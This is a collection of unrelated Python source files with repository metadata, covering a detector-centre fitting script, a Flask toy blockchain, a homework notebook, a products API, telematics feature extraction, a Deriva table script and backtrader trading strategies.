args {List[str]} -- arguments
"""
parser = argparse.ArgumentParser(
description="Detector center search, based on random selection of circumscribed circle centers"
)
parser.add_argument(
"--iterations",
type=int,
default=10000,
help="Number of times algorithm will try to guess center choosing 3 random points",
)
parser.add_argument(
"input_json", type=str, help="input json file, produced by streampeaks2json.py",
)
parser.add_argument(
"--rmin", type=int, default=None, help="Minimum radius for center estimation"
)
parser.add_argument(
"--rmax", type=int, default=None, help="Maximum radius for center estimation"
)
parser.add_argument(
"--center_fs",
type=int,
default=None,
help="Presumable center fs for acute angle rejection",
)
parser.add_argument(
"--center_ss",
type=int,
default=None,
help="Presumable center ss for acute angle rejection",
)
parser.add_argument(
"--plot", help="Whether to save plots or not", action="store_true",
)
parser.add_argument(
"--nbins", type=int, default=1000, help="Number of bins for radial binning"
)
args = parser.parse_args()
with open(args.input_json) as f:
peaks = json.load(f)
number_of_panels = len(set([elem["panel"] for elem in peaks.values()]))
assert number_of_panels == 1, f"Wrong number of panels: {number_of_panels}"
points = np.array([(elem["fs"], elem["ss"]) for elem in peaks.values()])
if args.center_fs is not None and args.center_ss is not None:
presumable_centre = np.array([args.center_fs, args.center_ss])
else:
presumable_centre = None
answ = []
for _ in tqdm(range(args.iterations), desc="Sampling points"):
idx = np.random.randint(points.shape[0], size=3)
T = points[idx]
cur = circle(T, acute_angle=True, presumable_centre=presumable_centre)
if cur is not None:
answ.append(cur)
fs, ss, rs = np.array(answ).T
bins = radial_binning(fs, ss, rs, N=args.nbins)
if args.plot:
plt.plot(bins.T[0], bins.T[2], label="fs")
plt.plot(bins.T[0], bins.T[3], label="ss")
plt.xlim(args.rmin, args.rmax)
plt.savefig(f"{args.input_json}_plot.png", dpi=300)
print(f"Saved {args.input_json}_plot.png")
(fs, fs_s), (ss, ss_s) = get_center_position_from_binning(
bins, rmin=args.rmin, rmax=args.rmax
)
print(f"fs: {fs} +- {fs_s}; ss: {ss} +- {ss_s}")
if __name__ == "__main__":
if not sys.warnoptions:
warnings.simplefilter("ignore")
main(sys.argv[1:])
| authors: ["marin@phystech.edu"] | author_id: marin@phystech.edu |
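The circle() helper in json2center.py recovers the circumscribed circle of three peaks from a 2x2 linear system. The system it solves, written out with the same point numbering as the code (the centre is equidistant from the three points; subtracting the squared-distance equations pairwise gives):

```latex
\begin{pmatrix} x_3 - x_1 & y_3 - y_1 \\ x_3 - x_2 & y_3 - y_2 \end{pmatrix}
\begin{pmatrix} x \\ y \end{pmatrix}
= \frac{1}{2}
\begin{pmatrix} x_3^2 + y_3^2 - x_1^2 - y_1^2 \\ x_3^2 + y_3^2 - x_2^2 - y_2^2 \end{pmatrix},
\qquad r = \sqrt{(x - x_1)^2 + (y - y_1)^2}
```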
| blob_id: 945d4b45857ddcb47d20b1ccef7019f02c040f02 | directory_id: 0dc2d6677fa38c0737e009d0576c74257315110d | content_id: 663c1de28ab8cecf83c2eb4bd56a6a2ba4a94e94 |
| path: /app.py | repo_name: ysa23/blockchain | branch_name: refs/heads/master |
| snapshot_id: 077778c283329f42e8cbed8e8a03db62e8b0c29b | revision_id: ce2d91449e881f74edf2d52a5e4c4ef6d917f625 |
| detected_licenses: [] | license_type: no_license | visit_date: 2021-08-16T01:29:22.298169 | revision_date: 2017-11-18T19:54:06 | committer_date: 2017-11-18T19:54:06 |
| github_id: 110,583,371 | star_events_count: 0 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,443 | extension: py |
content:
from textwrap import dedent
from flask import Flask, jsonify, request
from uuid import uuid4
from blockchain import Blockchain
app = Flask(__name__)
node_identifier = str(uuid4()).replace('-', '')
blockchain = Blockchain()
@app.route('/mine', methods=['GET'])
def mine():
last_block = blockchain.last_block
last_proof = last_block['proof']
proof = blockchain.proof_of_work(last_proof)
blockchain.new_transaction(sender="0", recipient=node_identifier, amount=1)
block = blockchain.new_block(proof=proof, previous_hash=last_block['previous_hash'])
response = {
'message': "New Block Forged",
'index': block['index'],
'transactions': block['transactions'],
'proof': block['proof'],
'previous_hash': block['previous_hash']
}
return jsonify(response), 200
@app.route('/transactions/new', methods=['POST'])
def new_transaction():
transaction = request.get_json()
required = ['sender', 'recipient', 'amount']
if not all(k in transaction for k in required):
return 'Missing values in transaction', 400
index = blockchain.new_transaction(transaction['sender'], transaction['recipient'], transaction['amount'])
response = {
'message': f'Transaction will be added to Block {index}'
}
return jsonify(response), 201
@app.route('/chain', methods=['GET'])
def full_chain():
response = {
'chain': blockchain.chain,
'length': len(blockchain.chain),
}
return jsonify(response), 200
@app.route('/nodes/register', methods=['POST'])
def register_node():
values = request.get_json()
nodes = values.get('nodes')
if nodes is None:
return 'Error: please supply a list of nodes', 400
for node in nodes:
blockchain.register_node(node)
response = {
'message': 'New nodes have been added',
'total_nodes': list(blockchain.nodes),
}
return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
replaced = blockchain.resolve_conflicts()
if replaced:
response = {
'message': 'Our chain has been replaced',
'new_chain': blockchain.chain
}
else:
response = {
'message': 'Our chain is authoritative',
'chain': blockchain.chain
}
return jsonify(response), 200
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
| authors: ["yossi@sears.co.il"] | author_id: yossi@sears.co.il |
| blob_id: 8d2bcd5d0667c194c2a3756cc75b8e871825893f | directory_id: 02ce427febaf19edd64b8fb07d0e442c56836225 | content_id: e83ee5214f5c4ece9053fe2b100d2913b42f1c79 |
| path: /Week 3/Homework/Homework2.py | repo_name: joostecg/PH526x | branch_name: refs/heads/master |
| snapshot_id: 95ca712877020317571d9da0802b8e1cd242984b | revision_id: 0d0fbee1d983f33e5cc528d7bcd30b2b3caac7eb |
| detected_licenses: [] | license_type: no_license | visit_date: 2021-01-25T08:06:35.813282 | revision_date: 2017-06-08T05:46:15 | committer_date: 2017-06-08T05:46:15 |
| github_id: 93,711,430 | star_events_count: 1 | fork_events_count: 0 | gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null |
| src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,345 | extension: py |
content:
# Exercise 1
# Exercise 2
# Exercise 3
hamlets = ## Enter code here! ###
book_dir = "Books"
title_num = 1
for language in book_titles:
for author in book_titles[language]:
for title in book_titles[language][author]:
if title == "Hamlet":
inputfile = data_filepath+"Books/"+language+"/"+author+"/"+title+".txt"
text = read_book(inputfile)
distribution = ## Enter code here! ###
hamlets.loc[title_num] = language, distribution
title_num += 1
# Exercise 4
colors = ["crimson", "forestgreen", "blueviolet"]
handles, hamlet_languages = [], []
for index in range(hamlets.shape[0]):
language, distribution = hamlets.language[index+1], hamlets.distribution[index+1]
dist = more_frequent(distribution)
plot, = plt.loglog(sorted(list(dist.keys())),sorted(list(dist.values()),
reverse = True), color = colors[index], linewidth = 2)
handles.append(plot)
hamlet_languages.append(language)
plt.title("Word Frequencies in Hamlet Translations")
xlim = [0, 2e3]
xlabel = "Frequency of Word $W$"
ylabel = "Fraction of Words\nWith Greater Frequency than $W$"
plt.xlim(xlim); plt.xlabel(xlabel); plt.ylabel(ylabel)
plt.legend(handles, hamlet_languages, loc = "upper right", numpoints = 1)
# show your plot using `plt.show`!
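# --- Illustrative sketch (not part of the original homework) ---
# The plot above relies on a course-provided helper `more_frequent`; judging from
# the axis labels it is assumed to map each word frequency to the fraction of
# distinct words that occur more often. A hypothetical implementation could be:
#
# def more_frequent(distribution):
#     # distribution: {word_frequency: number_of_distinct_words_with_that_frequency}
#     frequencies = sorted(distribution)
#     total = float(sum(distribution.values()))
#     return {f: sum(distribution[g] for g in frequencies if g > f) / total
#             for f in frequencies}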
|
[
"joostecg@gmail.com"
] |
joostecg@gmail.com
|
4500eb9123833c1245e3ab171d6fb8e92aa11c99
|
32a2fdbce84b5d7c312bbdd1b091cbe4a3ed3a89
|
/core/products/__init__.py
|
f10da071df84ce620478227026411e28181ceaaa
|
[] |
no_license
|
threedium/gridscale
|
e846ff1c74e9e329408cfcbec940cbdb23b92b02
|
cdeaa656cfbabf232a7aa163ec18dc314f14c2d9
|
refs/heads/master
| 2022-12-10T21:26:26.529206
| 2020-01-14T04:33:13
| 2020-01-14T04:33:13
| 228,313,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,406
|
py
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from __future__ import (unicode_literals, print_function)
import os
import random
import string
from flask import (Blueprint, request, jsonify, make_response)
prod = Blueprint('prod', __name__)
from core import db
from core.models import (Products)
def create_products():
# create products from flat file
response = False
if os.path.isfile('prods.txt'):
prods = Products.query.all()
if len(prods) > 0:
response = True
else:
i = 0
with open('prods.txt') as f:
content=f.readlines()
content = [x.strip() for x in content]
for k in content:
prd = {}
# To avoid Auto-Increment issues with SQLite incl below code
# init += 1
# prd['product_id'] = init
prd['price_net'] = float(random.randint(1,50))
prd['name'] = k.replace(" ", "_")
prd['status'] = 'Active'
if len(k) > 0:
try:
if not i:
add_prd = Products(
product_id=231415161,
name=k.replace(" ", "_"),
price_net=random.randint(1,50),
status="Active"
)
else:
add_prd = Products(
# product_id=231415161,
name=k.replace(" ", "_"),
price_net=random.randint(1,50),
status="Active"
)
db.session.add(add_prd)
db.session.commit()
i += 1
except Exception as e:
return False
return response
@prod.route('/products', methods=['POST', 'GET'])
def products():
data = request.args.to_dict()
create_products()
if len(data) > 0:
# filter data (name or status)
product = None
if 'name' in data:
product = Products.query.filter(Products.name == data['name']).first()
elif 'status' in data:
product = Products.query.filter(Products.status == data['status']).first()
if product is None:
return make_response(" ", 404)
else:
obj = {
'product_id': product.product_id,
'name': product.name,
'price_net': "{0:.2f}".format(product.price_net),
'status': product.status
}
response = jsonify(obj)
response.status_code = 200
return response
else:
# return Products Obj
products = Products.query.all()
if len(products) > 0:
results = []
for product in products:
obj = {
'product_id': product.product_id,
'name': product.name,
'price_net': "{0:.2f}".format(product.price_net),
'status': product.status
}
results.append(obj)
response = jsonify(results)
response.status_code = 200
return response
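# --- Illustrative usage (not part of the original blueprint) ---
# Once `prod` is registered on a Flask app, the route above can be exercised
# with e.g. the `requests` library (host, port and any url_prefix are
# placeholders for illustration):
#
#   import requests
#   requests.get("http://localhost:5000/products").json()
#   requests.get("http://localhost:5000/products", params={"name": "some_product"}).json()
#   requests.get("http://localhost:5000/products", params={"status": "Active"}).json()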
|
[
"se.wanyama@gmail.com"
] |
se.wanyama@gmail.com
|
d5c5779cb06cd034955a358e57ccad53113de7b0
|
bfc25f1ad7bfe061b57cfab82aba9d0af1453491
|
/data/external/repositories/141822/AXA_Telematics-master/Features/modules_janto/featureFun.py
|
6077221b9a1eba16c0182067048fda6cda0a3b49
|
[
"MIT"
] |
permissive
|
Keesiu/meta-kaggle
|
77d134620ebce530d183467202cf45639d9c6ff2
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
refs/heads/master
| 2020-03-28T00:23:10.584151
| 2018-12-20T19:09:50
| 2018-12-20T19:09:50
| 147,406,338
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,821
|
py
|
# -*- coding: utf-8 -*-
"""
(c) 2015
@author: Janto Oellrich
email: joellrich@uos.de
CONTENT:
    Contains FEATURE EXTRACTION functions for
    the AXA telematics competition.
FUNCTION LIST:
features: creates feature vector for one trip
driverFrame: creates feature matrix containing features
of all trips of one driver
createFeatmat: create feature matrix for all drivers
"""
from load import *
from modules import *
from paths import *
def features(trip,plotting=False):
"""
Extracts features of a trip dataframe.
OUTPUT:
np.array including features
list of angles between points in deg
"""
# 1. duration
duration = len(trip)
# 2. speed: euclidean distance between adjacent points
speed = np.sum(np.diff(trip,axis=0)**2,axis=1)**0.5
### 2.1. smooth GPS data (by convolution) ####
smooth_speed = movingaverage(speed,10)
#smooth_speed[np.where(smooth_speed>65)[0]] = smooth_speed[np.where(smooth_speed>65)[0]-1]
# head changes
head = np.diff(trip,axis=0)
head_x,head_y = head[:,0],head[:,1]
head_quantiles_x = ss.mstats.mquantiles(head_x,np.linspace(0.02,0.99,10))
head_quantiles_y = ss.mstats.mquantiles(head_y,np.linspace(0.02,0.99,10))
# compute speed statistics
mean_speed = smooth_speed.mean()
max_speed = max(smooth_speed)
std_speed = speed.std()
# 3. acceleration
smooth_accel = np.diff(smooth_speed)
# 3.1 get all negative acceleration values
accel_s = np.array(smooth_accel)
neg_accel = accel_s[accel_s<0]
pos_accel = accel_s[accel_s>0]
# 3.3 average breaking strength
mean_breaking = neg_accel.mean()
mean_acceleration = pos_accel.mean()
# summary statistics
std_breaking = neg_accel.std()
std_acceleration = pos_accel.std()
# 4. total distance traveled
total_dist = np.sum(smooth_speed,axis=0)
# 5. relative standzeit (last 5% are discarded due standing)
last = round(len(trip)*0.05)
eps = 1 # threshold for determining standing
# relative standzeit
speed_red = np.array(speed)[:last]
standzeit = len(speed_red[speed_red<0+eps])/float(duration)
#### DRIVING STYLE REALTED FEATURES ####
# 1. acceleration from stop
# 1.1 get end of stops: where is speed near zero
end_stops = stops(smooth_speed)
n_stops = len(end_stops) # how many stops
# 1.2 how does the driver accelerate from stop?
end_stops = end_stops.astype(int)[:-1,1]
# following interval
interval = 7 # 7 seconds following end of stop
# only those which dont exceed indices of trip
end_stops = end_stops[end_stops+interval<len(smooth_speed)-1]
n_stops = len(end_stops)
if n_stops>1:
anfahren = np.zeros(shape=(1,n_stops)) # initialize array
for i in range(n_stops):
# slope at acceleration
start = end_stops[i]
anfahren[0,i] = np.diff([smooth_speed[start],smooth_speed[start+interval]])
else:
anfahren = np.array([0])
# compute statistics
mean_anfahren = anfahren.mean()
max_anfahren = anfahren.max()
std_anfahren = anfahren.std()
# end cell
last_cell = rounddown(normalize(trip[-2:,:]),30)[-1]
# determine trip is a back-home trip
if last_cell[0]==0 and last_cell[1]==0:
hometrip=1
else:
hometrip=0
# speed quantiles
speed_quantiles = ss.mstats.mquantiles(smooth_speed,np.linspace(0.02,0.99,25))
# acceleration quantiles
accel_quantiles = ss.mstats.mquantiles(smooth_accel,np.linspace(0.02,0.99,25))
################# PLOTS #################
if plotting:
figure()
x = range(1,len(trip)) # x values for plotting
#plot(x,total_dist,label='velocity') #speed
hold('on')
#plot(x,accel,color='red',alpha=0.6,label='acceleration') #acceleration
grid('on')
xlabel('time')
# plot smoothed speed data
plot(smooth_speed,color='k',label='Spline Interpol')
# plot smoothed accelerationd data
plot(smooth_accel,'red',label='Acceleration')
legend(loc='best')
#legend()
######################################
return np.concatenate((speed_quantiles,accel_quantiles,head_quantiles_x,head_quantiles_y,np.array([duration,total_dist,standzeit,std_speed,std_breaking,std_acceleration,std_anfahren,mean_anfahren,max_anfahren,n_stops,hometrip])))
def driverFrame(driver,n_features=10):
# initialize dataframe
trips = np.zeros(shape=(200,n_features))
# load all trips at once
all_trips = loadDriver(driver)
counter = 0
for trip in all_trips:
trips[counter,:] = features(trip,False)
counter += 1
return trips
def createFeatmat():
"""
Computes the features of all trips and stores them in a matrix.
"""
driverFolder = DATA
# driver IDs
drivers = sorted([int(folderName) for folderName in os.listdir(driverFolder)])
print 'Creating feature matrix...'
n_feat = 81
for i,driver in enumerate(drivers):
if i == 0:
featmat = driverFrame(driver,n_feat)
else:
featmat = np.vstack((featmat,driverFrame(driver,n_feat)))
print '\t\t{0} trips, {1} features'.format(featmat.shape[0],featmat.shape[1])
# write to file
    np.save(os.path.join(FEATURES, 'featurematrix1.npy'), featmat)
return featmat
|
[
"keesiu.wong@gmail.com"
] |
keesiu.wong@gmail.com
|
034075db05af08fc51f6883ff05c168ed826538f
|
e8b7d79faec702bc95b4563520413c61ffe1640d
|
/script/initialization/03_create_table_File.py
|
4514e72a398500418a35a23bf731820662d79b30
|
[
"Apache-2.0"
] |
permissive
|
informatics-isi-edu/nsf-core
|
8511f82df22da4eecb3ae6ee9e4033012915999b
|
8073c62fbf338e3e88430c136fa99772481174f2
|
refs/heads/master
| 2020-03-23T21:07:03.405120
| 2019-03-07T20:14:06
| 2019-03-07T20:14:06
| 142,082,834
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,809
|
py
|
from deriva.core import DerivaServer, get_credential
from deriva.core.ermrest_model import Table, Column, Key,ForeignKey,builtin_types as typ
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('hostname')
parser.add_argument('catalog_number')
parser.add_argument('schema_name')
args = parser.parse_args()
hostname = args.hostname
schema_name = args.schema_name
catalog = args.catalog_number
credential = get_credential(hostname)
server = DerivaServer('https', hostname, credential)
catalog = server.connect_ermrest(catalog)
model = catalog.getCatalogModel()
schema = model.schemas[schema_name]
config = catalog.getCatalogConfig()
column_defs = [
Column.define("Category_RID", typ.text),
Column.define("Name", typ.text),
Column.define("Description", typ.text),
Column.define("URI", typ.text),
Column.define("Size", typ.int4),
Column.define("MD5", typ.text),
]
key_defs = [
Key.define(
["Category_RID","Name"], # this is a list to allow for compound keys
constraint_names=[ [schema_name, "File_Category_RID_Name_key"] ],
comment="file category and file name must be distinct.",
annotations={},
)
]
fkey_defs = [
ForeignKey.define(
["Category_RID"], # this is a list to allow for compound foreign keys
"Vocab",
"File_Category",
["RID"], # this is a list to allow for compound keys
on_update='CASCADE',
on_delete='SET NULL',
constraint_names=[ [schema_name, "File_Category_RID_fkey"] ],
comment="",
acls={},
acl_bindings={},
annotations={},
)
]
table_def = Table.define(
"File",
column_defs,
key_defs=key_defs,
fkey_defs=fkey_defs,
comment="file information",
acls={},
acl_bindings={},
annotations={},
provide_system=True,
)
new_table = schema.create_table(catalog, table_def)
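# --- Illustrative invocation (not part of the original script) ---
# The script takes the three positional arguments parsed above; the hostname,
# catalog number and schema name below are placeholders:
#
#   python 03_create_table_File.py my-host.example.org 1 my_schema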
|
[
"35635511+ytfqj@users.noreply.github.com"
] |
35635511+ytfqj@users.noreply.github.com
|
305694dae099f4bf0087378a3e5018ba3d189b9e
|
795a37b6aeaaedc8b2c7b525a037b9533233bafb
|
/scrape_mars.py
|
c0dacb96bdbd5d720d581f4ec567e39b46f01891
|
[] |
no_license
|
arthurosakwe/mission_to_mars
|
8599eee09d157f1f42eb5b9cb588a4da3bcf8424
|
ac45c79749e603eda6d64a1a93e2f41f2168dd59
|
refs/heads/master
| 2020-04-07T18:07:44.580635
| 2018-11-21T21:25:03
| 2018-11-21T21:25:03
| 158,598,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,510
|
py
|
# coding: utf-8
# In[1]:
#import dependencies
from bs4 import BeautifulSoup as bs
from splinter import Browser
import os
import pandas as pd
import time
# In[2]:
def init_browser():
executable_path = {"executable_path":"C:\chromedriver_win32\chromedriver"}
return Browser("chrome", **executable_path, headless = False)
def scrape():
browser = init_browser()
    mars_facts_data = {}
nasa = "https://mars.nasa.gov/news/"
browser.visit(nasa)
time.sleep(2)
html = browser.html
soup = bs(html,"html.parser")
#scrapping latest news about mars from nasa
news_title = soup.find("div",class_="content_title").text
news_paragraph = soup.find("div", class_="article_teaser_body").text
mars_facts_data['news_title'] = news_title
mars_facts_data['news_paragraph'] = news_paragraph
#Mars Featured Image
nasa_image = "https://www.jpl.nasa.gov/spaceimages/?search=&category=featured#submit"
browser.visit(nasa_image)
time.sleep(2)
from urllib.parse import urlsplit
base_url = "{0.scheme}://{0.netloc}/".format(urlsplit(nasa_image))
xpath = "//*[@id=\"page\"]/section[3]/div/ul/li[1]/a/div/div[2]/img"
#Use splinter to click on the mars featured image
#to bring the full resolution image
results = browser.find_by_xpath(xpath)
img = results[0]
img.click()
time.sleep(2)
#get image url using BeautifulSoup
html_image = browser.html
soup = bs(html_image, "html.parser")
img_url = soup.find("img", class_="fancybox-image")["src"]
full_img_url = base_url + img_url
mars_facts_data["featured_image"] = full_img_url
# #### Mars Weather
#get mars weather's latest tweet from the website
url_weather = "https://twitter.com/marswxreport?lang=en"
browser.visit(url_weather)
html_weather = browser.html
soup = bs(html_weather, "html.parser")
mars_weather = soup.find("p", class_="TweetTextSize TweetTextSize--normal js-tweet-text tweet-text").text
mars_facts_data["mars_weather"] = mars_weather
# #### Mars Facts
url_facts = "https://space-facts.com/mars/"
time.sleep(2)
table = pd.read_html(url_facts)
table[0]
df_mars_facts = table[0]
df_mars_facts.columns = ["Parameter", "Values"]
clean_table = df_mars_facts.set_index(["Parameter"])
mars_html_table = clean_table.to_html()
mars_html_table = mars_html_table.replace("\n", "")
mars_facts_data["mars_facts_table"] = mars_html_table
    return mars_facts_data
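# --- Illustrative entry point (not part of the original scraper) ---
# Running the module directly prints the scraped dictionary; this assumes the
# chromedriver path configured in init_browser() is valid on the local machine.
if __name__ == "__main__":
    print(scrape())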
|
[
"noreply@github.com"
] |
arthurosakwe.noreply@github.com
|
a5dc2d3eb8c1c3570c78cc8340e536ee6a689fad
|
41ab75ef3dbb7293c94aa0fd075316b90b930c27
|
/11.py
|
f1ed666ed6dcfca61daaebb54101b17c0c8222be
|
[] |
no_license
|
3232731490/Python
|
91716d8bcb8d2f193743118cd0bb73e4f307854c
|
1a76a2b4d1f21c4e2caece507f1655c3eb751aa9
|
refs/heads/main
| 2023-02-05T11:46:08.915601
| 2020-12-27T11:36:24
| 2020-12-27T11:36:24
| 324,100,187
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 569
|
py
|
class cenius:
def __init__(self,value=20.0):
print('init')
self.value=float(value)
def __get__(self,instance,owner):
print('cel_get')
return self.value
def __set__(self,instance,value):
print('cel_set')
self.value=float(value)
class Huashi:
    def __get__(self,instance,owner):
print('huashi_get')
return instance.cel*1.8+32
def __set__(self,instance,value):
print('huashi_set')
instance.cel=(float(value)-32.0)/1.8
class Temp:
cel=cenius()
huashi=Huashi()
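# --- Illustrative usage (not part of the original file) ---
# Demonstrates how the two descriptors cooperate on a Temp instance: reading or
# writing `huashi` (Fahrenheit) is routed through `cel` (Celsius).
if __name__ == '__main__':
    t = Temp()
    t.cel = 30        # cel_set
    print(t.huashi)   # huashi_get -> cel_get, prints 86.0
    t.huashi = 212    # huashi_set -> cel_set
    print(t.cel)      # cel_get, prints 100.0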
|
[
"3232731490@qq.com"
] |
3232731490@qq.com
|
6f0f37984334bfa33641cc9897992255772952bf
|
712a494b06e1f48c158e0286d3e604c64f7d2e87
|
/backtrader/bt_step5.py
|
af73c528744820beb09a4b91aa72d36894f023b0
|
[] |
no_license
|
juvu/ccxt_test
|
db0b6d9080bb59981ab748087b4a8cc3220c7922
|
842b42176b961cad690dd9e70b63a9a2e34216e5
|
refs/heads/master
| 2022-03-24T20:39:05.624946
| 2019-11-21T15:25:08
| 2019-11-21T15:25:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,917
|
py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import datetime # For datetime objects
import os.path # To manage paths
import sys # To find out the script name (in argv[0])
import pandas as pd
# Import the backtrader platform
import backtrader as bt
import backtrader.indicators as btind
import backtrader.feeds as btfeeds
class MyStrategy2(bt.Strategy):
params = dict(period=20)
def __init__(self):
self.movav = btind.SimpleMovingAverage(self.data, period=self.p.period)
def next(self):
if self.movav.lines.sma[0] > self.data.lines.close[0]:
print('Simple Moving Average is greater than the closing price')
# Create a subclass of Strategy to define the indicators and logic
class SmaCross(bt.Strategy):
# list of parameters which are configurable for the strategy
params = dict(
pfast=10, # period for the fast moving average
pslow=30 # period for the slow moving average
)
def __init__(self):
sma1 = bt.ind.SMA(period=self.p.pfast) # fast moving average
sma2 = bt.ind.SMA(period=self.p.pslow) # slow moving average
self.crossover = bt.ind.CrossOver(sma1, sma2) # crossover signal
def next(self):
if not self.position: # not in the market
if self.crossover > 0: # if fast crosses slow to the upside
self.buy() # enter long
elif self.crossover < 0: # in the market & cross to the downside
self.close() # close long position
# Create a subclass of Strategy to define the indicators and logic
class CdmaCross(bt.Strategy):
# list of parameters which are configurable for the strategy
params = (
# Standard MACD Parameters
('macd1', 12),
('macd2', 26),
('macdsig', 9),
('atrperiod', 14), # ATR Period (standard)
('atrdist', 3.0), # ATR distance for stop price
('smaperiod', 30), # SMA Period (pretty standard)
('dirperiod', 10), # Lookback period to consider SMA trend direction
)
def __init__(self):
self.macd = bt.indicators.MACD(self.data,
period_me1=self.p.macd1,
period_me2=self.p.macd2,
period_signal=self.p.macdsig)
# Cross of macd.macd and macd.signal
self.mcross = bt.indicators.CrossOver(self.macd.macd, self.macd.signal)
# Control market trend
self.sma = bt.indicators.SMA(self.data, period=self.p.smaperiod)
        self.smadir = self.sma - self.sma(-self.p.dirperiod)
        # ATR drives the trailing stop in next(); without it self.atr would be undefined
        self.atr = bt.indicators.ATR(self.data, period=self.p.atrperiod)
    def start(self):
        self.order = None  # sentinel to avoid operations on pending order
    def notify_order(self, order):
        # clear the sentinel once the broker reports the order as no longer pending,
        # otherwise next() would keep returning early after the first buy
        if order.status not in [order.Submitted, order.Accepted]:
            self.order = None
    def next(self):
        if self.order:
            return  # pending order execution
        if not self.position:  # not in the market
            if self.mcross[0] > 0.0 and self.smadir < 0.0:
                self.order = self.buy()
                pdist = self.atr[0] * self.p.atrdist
                self.pstop = self.data.close[0] - pdist  # initialise the trailing stop
else: # in the market
pclose = self.data.close[0]
pstop = self.pstop
if pclose < pstop:
self.close() # stop met - get out
else:
pdist = self.atr[0] * self.p.atrdist
# Update only if greater than
self.pstop = max(pstop, pclose - pdist)
# Create a Stratey
class TestStrategy(bt.Strategy):
def log(self, txt, dt=None):
''' Logging function for this strategy'''
dt = dt or self.datas[0].datetime.date(0)
print('%s, %s' % (dt.isoformat(), txt))
def __init__(self):
# Keep a reference to the "close" line in the data[0] dataseries
self.dataclose = self.datas[0].close
# To keep track of pending orders
self.order = None
def notify_order(self, order):
if order.status in [order.Submitted, order.Accepted]:
# Buy/Sell order submitted/accepted to/by broker - Nothing to do
return
# Check if an order has been completed
# Attention: broker could reject order if not enough cash
if order.status in [order.Completed]:
if order.isbuy():
self.log('BUY EXECUTED, %.2f' % order.executed.price)
elif order.issell():
self.log('SELL EXECUTED, %.2f' % order.executed.price)
self.bar_executed = len(self)
elif order.status in [order.Canceled, order.Margin, order.Rejected]:
self.log('Order Canceled/Margin/Rejected')
# Write down: no pending order
self.order = None
def next(self):
# Simply log the closing price of the series from the reference
self.log('Close, %.2f' % self.dataclose[0])
# Check if an order is pending ... if yes, we cannot send a 2nd one
if self.order:
return
# Check if we are in the market
if not self.position:
# Not yet ... we MIGHT BUY if ...
if self.dataclose[0] < self.dataclose[-1]:
# current close less than previous close
if self.dataclose[-1] < self.dataclose[-2]:
# previous close less than the previous close
# BUY, BUY, BUY!!! (with default parameters)
self.log('BUY CREATE, %.2f' % self.dataclose[0])
# Keep track of the created order to avoid a 2nd order
self.order = self.buy()
else:
# Already in the market ... we might sell
if len(self) >= (self.bar_executed + 5):
# SELL, SELL, SELL!!! (with all possible default parameters)
self.log('SELL CREATE, %.2f' % self.dataclose[0])
# Keep track of the created order to avoid a 2nd order
self.order = self.sell()
if __name__ == '__main__':
# Create a cerebro entity
cerebro = bt.Cerebro()
# Add a strategy
# cerebro.addstrategy(SmaCross)
cerebro.addstrategy(CdmaCross)
# Datas are in a subfolder of the samples. Need to find where the script is
# because it could have been called from anywhere
modpath = os.path.join(os.getcwd(), 'data')
if not os.path.exists(modpath):
os.makedirs(modpath)
datapath = os.path.join(modpath, 'dfqc.csv')
dataframe = pd.read_csv(datapath, index_col=0, parse_dates=True)
dataframe['openinterest'] = 0
data = bt.feeds.PandasData(dataname=dataframe,
fromdate=datetime.datetime(2015, 1, 1),
todate=datetime.datetime(2016, 12, 31)
)
    # ----------------------------------------------------------------------
    # Copyright notice: this snippet is adapted from an original article by the
    # CSDN blogger "钱塘小甲子", released under the CC 4.0 BY-SA license; keep the
    # source link and this notice when redistributing.
    # Original link: https://blog.csdn.net/qtlyx/article/details/70945174
# Create a Data Feed
# data = bt.feeds.YahooFinanceCSVData(
# dataname=datapath,
# # Do not pass values before this date
# fromdate=datetime.datetime(2014, 2, 1),
# # Do not pass values before this date
# todate=datetime.datetime(2014, 12, 31),
# # Do not pass values after this date
# reverse=False)
# Add the Data Feed to Cerebro
cerebro.adddata(data)
# Set our desired cash start
cerebro.broker.setcash(100000.0)
# Print out the starting conditions
print('Starting Portfolio Value: %.2f' % cerebro.broker.getvalue())
# Run over everything
cerebro.run()
# Print out the final result
print('Final Portfolio Value: %.2f' % cerebro.broker.getvalue())
# Plot the result
cerebro.plot()
|
[
"flyhawksz@163.com"
] |
flyhawksz@163.com
|
1c8d05e67cfb13334be391982bc7649233111970
|
56ffe678e18f00661d55bbedf28b3d37edb54434
|
/weaklens_select.py
|
1ce8ca51dad0991a95d971b5784603cc523f675a
|
[] |
no_license
|
amitkiucaa/weaklens_pipeline_by_Surhud_modified_by_Amit
|
dd05d862878edb4836fb77177f6ebc40a5296579
|
f9bf5ddd6f4a69fa449ce8163dadf54c80234312
|
refs/heads/master
| 2022-12-01T13:03:55.669033
| 2020-08-23T12:08:21
| 2020-08-23T12:08:21
| 284,535,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 63,745
|
py
|
import numpy as np
from astropy.io import fits as pyfits
from astropy.io import fits
import pandas
import sys
import fitsio
import glob
from sqlitedict import SqliteDict
import gnupg
gpg = gnupg.GPG()
def FITS_to_PGP(message):
"""
Turns a string stored into an FITS comment back into a proper
PGP message
"""
s = "-----BEGIN PGP MESSAGE-----\n\n"
s += message
s += "\n-----END PGP MESSAGE-----\n"
return s
# This is the function which you will use to decrypt the string
def decrypt_string(encrypted_string):
#string = getpass.getpass(prompt="Enter passphrase to unlock the private key:\n")
decrypted_data = gpg.decrypt(encrypted_string) #, passphrase=string)
print 'ok: ', decrypted_data.ok
